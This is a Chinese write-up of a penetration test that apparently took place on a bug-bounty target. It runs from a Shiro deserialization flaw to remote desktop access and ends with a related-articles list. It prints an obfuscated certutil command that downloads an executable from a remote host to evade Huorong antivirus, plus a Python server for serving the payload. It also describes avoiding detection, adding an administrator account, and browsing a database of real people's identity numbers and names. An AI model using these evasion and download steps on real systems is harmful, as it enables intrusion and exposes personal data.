记一次Shiro反序列化到远程桌面

简介: 记一次Shiro反序列化到远程桌面

感谢朋友@Sin的投稿,这篇文章记录的是他如何发现、利用Shiro反序列化漏洞,又是怎样绕过火绒安全防护实现文件落地、添加管理员,最后进入远程桌面,以及在测试过程中遇到的一些坑。




首先在奇安信hunter上搜索找到该SRC的有关资产(具体我就不放了),然后通过微步来搜索子域名找到今天的测试站点。


然后利用xray中检测到该站点存在Shiro反序列化漏洞


于是考虑直接用feihong的反序列话工具,但是这次feihong的反序列化工具只检测出key,gatget没有检测出来,咨询了同事琛哥后,故考虑到是因为工具很久没更新,需要找一条CB的链,啪的一下回车


直接开冲,先看下系统中是否存在杀毒软件,一目了然,系统中存在火绒杀毒软件。


在确定了目标系统存在火绒后我第一时间尝试了hta上线,相关文章内容:记一次绕过火绒安全提权实战案例


不过很可惜这个方法我在本地多次尝试后发现火绒已经对这个方法进行了拦截和查杀。


后续和3h师傅交流应该是对文件的特征进行了查杀,不过也没有在深一步探索绕过的方法。


题外话:这里测试的时候有一个小坑,感觉是工具的问题,工具在执行需要大量回显的数据包时会卡死,需要重新启动工具再执行一次命令才行。


这里绕过火绒选择了certutil远程下载方式,常规的cerutil直接下载肯定是不行的,于是想到了以前群里有师傅发过的变形版的certutil绕过方式。在本地测试后发现火绒没有拦截该命令,此时激动的小手已经焦躁不安。

    "c""e""r""t""u""t""i""l" -"u""r""l""c""a""c""h""e" -split -f https://url/1.exe 1.exe


    题外话:发现目标系统不解析我vps的IP,搞得我晚上凌晨还在四处找人要VPS,感觉还是得随时准备一台国内的vps和国外的一台vps。


    在找到vps后,先在工具上ping了一下vps的IP地址


    可以解析到ip美滋滋,不过在下载之前还是最好看看目标服务器最近的登陆时间,以免被发现


    直接开冲,首先在vps上启动一个临时的python web,命令如下。

      python -m SimpleHTTPServer 8888


      然后先在本地测试一下,看看可不可以下载下来,OK,没问题!


      现在直接到工具中在目标系统上执行,成功落地到当前路径下。


      执行dir命令查看是否成功下载到当前目录下


      运行文件后上线


      查看系统版本


      因为是高版本所以获取不到明文信息


      所以还有两个办法去远程连接, 一个是上传远控软件,另外一个就是直接添加用户。


      先看第一个吧,使用截屏命令看看是否处于锁屏状态


      由此可以判断当前机器应该是在锁屏中,所以这里只能我们自己添加一个用户上去。因为机器中存在火绒,所以还需要bypass火绒添加用户上去,方法我就暂时不放出来了(还请各位师傅见谅哈)


      用户加入完成后就可以进行远程桌面连接了,这里为了避免机器告警,我们还需要把3389转发出来。


      现在即可进行连接了


      然后进来后翻到了一个配置文件,里面有数据库的信息


      Mysql连接看看

      随便看一个表,好家伙,身份证,生日,姓名等等个人信息全部都有,就先不深入了,等进一步授权再搞。


      相关文章
      |
      安全 算法 Oracle
      【WEB安全】Apache Shiro 反序列化漏洞(上)
      Apache Shiro是一款开源企业常见JAVA安全框架,提供身份验证、授权、密码学和会话管理。java中的权限框架有SpringSecurity和Shiro,由于Spring功能强大但复杂,Shiro的简单强大,扩展性好因此用的还是很多。
      746 0
      【WEB安全】Apache Shiro 反序列化漏洞(上)
      |
      7月前
      |
      存储 搜索推荐 安全
      Java Web开发中的会话管理:Cookie与Session对比
      Java Web开发中的会话管理:Cookie与Session对比
      102 2
      |
      7月前
      |
      存储 JSON 安全
      使用shiro对数据库中的密码进行加密存储(java+springboot+shiro)
      使用shiro对数据库中的密码进行加密存储(java+springboot+shiro)
      216 0
      |
      7月前
      |
      XML 缓存 Java
      Shiro - 会话管理与SessionDao持久化Session
      Shiro提供了完整的企业级会话管理功能,不依赖于底层容器(如web容器tomcat),不管JavaSE还是JavaEE环境都可以使用,提供了会话管理、会话事件监听、会话存储/持久化、容器无关的集群、失效/过期支持、对Web 的透明支持、SSO 单点登录的支持等特性。
      353 0
      |
      Java 数据库 数据安全/隐私保护
      用shiro框架实现注册登陆,让你快速理解shiro用法
      用shiro框架实现注册登陆,让你快速理解shiro用法
      501 0
      用shiro框架实现注册登陆,让你快速理解shiro用法
      |
      缓存 安全 Java
      平台让人打穿了(Shiro反序列化)
      平台让人打穿了(Shiro反序列化)
      271 0
      |
      Java 网络安全
      【SSH】Struts2中的ModelDriven机制
      【SSH】Struts2中的ModelDriven机制
      67 0
      |
      安全 Java Shell
      Shiro序列化攻击
      Shiro序列化攻击
      |
      存储 缓存 开发框架
      shiro会话管理
      Shiro提供了完整的企业级会话管理功能,不依赖于底层容器(如Tomcat、WebLogic),不管是J2SE还是J2EE环境都可以使用,提供了会话管理,会话事件监听,会话存储/持久化,容器无关的集群,失效/过期支持,对Web的透明支持,SSO单点登录的支持等特性。